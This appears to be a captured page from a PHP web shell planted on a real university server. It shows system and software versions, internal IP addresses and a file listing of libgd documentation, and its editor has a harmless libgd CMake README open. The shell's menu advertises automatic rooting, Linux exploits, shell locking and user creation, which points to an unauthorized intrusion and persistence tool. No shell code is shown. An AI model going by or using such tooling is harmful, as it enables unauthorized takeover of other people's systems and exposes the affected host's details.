Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
share /
docs /
[ HOME SHELL ]
Name
Size
Permission
Action
arc.c
591
B
-rw-r--r--
copyrotated.c
1.81
KB
-rw-r--r--
crop.c
1.31
KB
-rw-r--r--
flip.c
1.18
KB
-rw-r--r--
gif.c
1.01
KB
-rw-r--r--
INSTALL
15.38
KB
-rw-r--r--
nnquant.c
1.15
KB
-rw-r--r--
noIconAlpha.tga
150.08
KB
-rw-r--r--
noIcon.pic
62
KB
-rw-r--r--
noIcon.sgi
65.04
KB
-rw-r--r--
noIcon.tga
150.08
KB
-rw-r--r--
README.CMAKE
1.42
KB
-rw-r--r--
README.JPN
1.75
KB
-rw-r--r--
README.TESTING
2.19
KB
-rw-r--r--
README.TXT
1.72
KB
-rw-r--r--
test_crop_threshold.png
7.73
KB
-rw-r--r--
tgaread.c
975
B
-rw-r--r--
tiffread.c
1.11
KB
-rw-r--r--
windows.c
7.3
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.CMAKE
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| To build GD using CMake, all you need is (add the cmake options if you need any or if the default libs and include paths are not the default) : In a sub directory of the top level: $ mkdir bld $ cd bld $ cmake -DBUILD_TEST=1 <options> .. $ make The available options are: ENABLE_PNG=1 ENABLE_JPEG=1 ENABLE_TIFF=1 ENABLE_FREETYPE=1 ENABLE_FONTCONFIG=1 ENABLE_XPM=1 ENABLE_WEBP=1 You can optionally run our tests suite using: $ ctest . Or if you like to build in the source tree: $ cmake -DBUILD_TEST=1 . $ make $ ctest . Add "-DCMAKE_BUILD_TYPE=DEBUG" if you like to have a debug version. To install, just run: $ make install Or to to install to a different path: $ make install DESTDIR=/some/other/place Typical usage with only PNG enabled: This command generates VS7 project files and add some custom libraries and includes directories (libpng in this case): cmake -DCMAKE_GENERATOR="Visual Studio 7 .NET 2003" -DENABLE_PNG=1 -DCMAKE_LIBRARY_PATH=c:\gd_build\gd_deps\lib -DCMAKE_INCLUDE_PATH=c:\gd_build\gd_deps\include c:\libgd_src A typical CMake call to build using the MinGW tools: cmake -G"MinGW Makefiles" -DCMAKE_LIBRARY_PATH=c:\mingw\lib -DCMAKE_INCLUDE_PATH=c:\MinGW\include -DENABLE_JPEG=On -DBUILD_TEST=On -DCMAKE_RELEASE_TYPE=DEBUG ..\libgd_head Given that your MinGW install is under c:\mingw and that you install all libraries using the /usr prefix
Close